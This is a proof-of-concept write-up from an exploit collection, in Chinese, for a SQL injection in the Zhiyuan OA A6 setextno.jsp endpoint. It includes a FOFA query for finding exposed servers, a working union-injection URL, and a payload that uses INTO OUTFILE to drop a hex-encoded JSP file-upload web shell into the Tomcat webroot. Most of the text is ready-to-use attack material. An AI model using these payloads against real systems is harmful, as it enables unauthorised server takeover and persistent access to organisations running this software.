Awesome-POC/OA产品漏洞/致远OA A6 setextno.jsp SQL注入漏洞.md

39 lines
1.2 KiB
Markdown
Raw Normal View History

2022-05-20 15:57:09 +08:00
# 致远OA A6 setextno.jsp SQL注入漏洞
## 漏洞描述
致远OA A6 setextno.jsp 存在sql注入漏洞并可以通过注入写入webshell文件控制服务器
## 漏洞影响
```
致远OA A6
```
## FOFA
```
title="致远A8+协同管理软件.A6"
```
## 漏洞复现
访问如下Url其中含有 union注入
```
/yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(99999) union all select 1,2,(md5(1)),4#
```
2022-12-05 11:09:28 +08:00
![image-20220520152851758](./images/202205201528813.png)
2022-05-20 15:57:09 +08:00
查看web路径
2022-12-05 11:09:28 +08:00
![image-20220520152913900](./images/202205201529936.png)
2022-05-20 15:57:09 +08:00
写入文件上传木马
```
http://xxx.xxx.xxx/yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(99999) union all select 1,2,(select unhex('3C25696628726571756573742E676574506172616D657465722822662229213D6E756C6C29286E6577206A6176612E696F2E46696C654F757470757453747265616D286170706C69636174696F6E2E6765745265616C5061746828225C22292B726571756573742E676574506172616D65746572282266222929292E777269746528726571756573742E676574506172616D6574657228227422292E67657442797465732829293B253E') into outfile 'D:/Program Files/UFseeyon/OA/tomcat/webapps/yyoa/test_upload.jsp'),4#
```
2022-12-05 11:09:28 +08:00
![image-20220520152936293](./images/202205201529359.png)